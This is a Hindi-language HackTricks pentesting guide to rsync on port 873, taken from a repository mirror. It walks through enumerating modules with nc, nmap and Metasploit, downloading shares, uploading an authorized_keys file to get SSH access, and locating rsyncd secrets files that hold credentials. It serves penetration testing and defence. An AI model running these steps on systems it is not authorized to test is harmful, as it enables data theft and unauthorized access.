Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 13:13:41 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/873-pentesting-rsync.md

104 lines
12 KiB
Markdown
Raw Blame History

# 873 - Rsync का पेंटेस्टिंग
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबरसिक्योरिटी कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन हैकट्रिक्स में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या हैकट्रिक्स को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* [**आधिकारिक PEASS & हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **[**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**टेलीग्राम ग्रुप**](https://t.me/peass) में या मुझे **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके.**
</details>
## **मूल जानकारी**
> **rsync** एक उपयोगिता है जो कंप्यूटर और बाहरी हार्ड ड्राइव के बीच और [नेटवर्क्ड](https://en.wikipedia.org/wiki/Computer\_network) [कंप्यूटर्स](https://en.wikipedia.org/wiki/Computer) के बीच [फाइलों](https://en.wikipedia.org/wiki/Computer\_file) को [स्थानांतरित](https://en.wikipedia.org/wiki/File\_transfer) करने और [सिंक्रोनाइज़](https://en.wikipedia.org/wiki/File\_synchronization) करने के लिए फाइलों के [संशोधन समय](https://en.wikipedia.org/wiki/Timestamping\_\(computing\)) और आकार की तुलना करके काम करती है। यह आमतौर पर [Unix-जैसे](https://en.wikipedia.org/wiki/Unix-like) [ऑपरेटिंग सिस्टम्स](https://en.wikipedia.org/wiki/Operating\_system) पर पाया जाता है। rsync एल्गोरिथ्म एक प्रकार का [डेल्टा एन्कोडिंग](https://en.wikipedia.org/wiki/Delta\_encoding) है, और नेटवर्क उपयोग को कम करने के लिए इस्तेमाल किया जाता है। [Zlib](https://en.wikipedia.org/wiki/Zlib) का उपयोग अतिरिक्त [डेटा संपीड़न](https://en.wikipedia.org/wiki/Data\_compression) के लिए किया जा सकता है, और [SSH](https://en.wikipedia.org/wiki/Secure\_Shell) या [stunnel](https://en.wikipedia.org/wiki/Stunnel) का उपयोग सुरक्षा के लिए किया जा सकता है।
[wikipedia](https://en.wikipedia.org/wiki/Rsync) से।
**डिफ़ॉल्ट पोर्ट:** 873
```
PORT STATE SERVICE REASON
873/tcp open rsync syn-ack
```
## सूचीकरण
### बैनर और मैनुअल संचार
```bash
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0 <--- You receive this banner with the version from the server
@RSYNCD: 31.0 <--- Then you send the same info
#list <--- Then you ask the sever to list
raidroot <--- The server starts enumerating
USBCopy
NAS_Public
_NAS_Recycle_TOSRAID <--- Enumeration finished
@RSYNCD: EXIT <--- Sever closes the connection
#Now lets try to enumerate "raidroot"
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
raidroot
@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g <--- This means you need the password
```
### **साझा फ़ोल्डरों का अनुक्रमण**
**एक rsync मॉड्यूल मूल रूप से एक डायरेक्टरी साझा है**। ये मॉड्यूल **वैकल्पिक रूप से पासवर्ड द्वारा सुरक्षित किए जा सकते हैं**। यह विकल्प उपलब्ध मॉड्यूलों को सूचीबद्ध करता है और, वैकल्पिक रूप से, यह निर्धारित करता है कि क्या मॉड्यूल को एक्सेस करने के लिए पासवर्ड की आवश्यकता है:
```bash
nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
msf> use auxiliary/scanner/rsync/modules_list
#Example using IPv6 and a different port
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730
```
ध्यान दें कि एक साझा नाम को सूचीबद्ध नहीं किया जा सकता है। इसलिए कुछ **छिपा** हो सकता है।\
ध्यान दें कि कुछ **साझा नाम** सूचीबद्ध हो सकते हैं जहाँ आपको पहुँचने के लिए कुछ (अलग) **प्रमाण-पत्र** की आवश्यकता हो सकती है। इसलिए, हमेशा सभी सूचीबद्ध नाम पहुँच योग्य नहीं होते हैं और आप इसे तब समझेंगे जब आपको किसी भी साझा फ़ोल्डर तक पहुँचने की कोशिश करते समय _**"Access Denied"**_ संदेश प्राप्त होता है।
### [**Brute force**](../generic-methodologies-and-resources/brute-force.md#rsync)
### मैनुअल Rsync
एक बार जब आपके पास **मॉड्यूलों की सूची** होती है, तो आपके पास कुछ अलग विकल्प होते हैं जो आपके द्वारा लेने वाले कार्यों और प्रमाणीकरण की आवश्यकता होने या न होने पर निर्भर करते हैं। **यदि प्रमाणीकरण की आवश्यकता नहीं है** तो आप एक साझा फ़ोल्डर की **सूची** बना सकते हैं:
```bash
rsync -av --list-only rsync://192.168.0.123/shared_name
```
और निम्नलिखित कमांड के माध्यम से अपनी स्थानीय मशीन पर सभी **files** को **copy** करें:
```bash
rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared
```
यह **निर्देशिका से सभी फाइलों को पुनरावृत्ति से स्थानांतरित करता है** `<shared_name>` मशीन `<IP>` से `./rsync_shared` निर्देशिका में स्थानीय मशीन पर। फाइलें "आर्काइव" मोड में स्थानांतरित की जाती हैं, जो सुनिश्चित करता है कि सिंबोलिक लिंक, उपकरण, गुण, अनुमतियां, स्वामित्व, आदि स्थानांतरण में संरक्षित रहें।
यदि आपके पास **प्रमाणीकरण हैं** तो आप **सूचीबद्ध/डाउनलोड** कर सकते हैं एक **साझा नाम** का उपयोग करते हुए (पासवर्ड संकेत किया जाएगा):
```bash
rsync -av --list-only rsync://username@192.168.0.123/shared_name
rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared
```
आप rsync का उपयोग करके कुछ **सामग्री** भी **अपलोड** कर सकते हैं (उदाहरण के लिए, इस मामले में हम बॉक्स तक पहुँच प्राप्त करने के लिए _**authorized\_keys**_ फ़ाइल अपलोड कर सकते हैं):
```bash
rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh
```
## POST
rsyncd विन्यास फ़ाइल खोजें:
```bash
find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)
```
कॉन्फ़िग फ़ाइल के अंदर कभी-कभी आपको _secrets file = /path/to/file_ पैरामीटर मिल सकता है और यह फ़ाइल में उपयोगकर्ता नाम और पासवर्ड हो सकते हैं जो rsyncd के लिए प्रमाणित करने की अनुमति देते हैं।
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **cybersecurity company** में काम करते हैं? क्या आप चाहते हैं कि आपकी **company का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) या [**telegram group**](https://t.me/peass) या **Twitter** पर मुझे **follow** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **अपने hacking tricks को साझा करें, hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **में PRs सबमिट करके.**
</details>
Reference in a new issue View git blame Copy permalink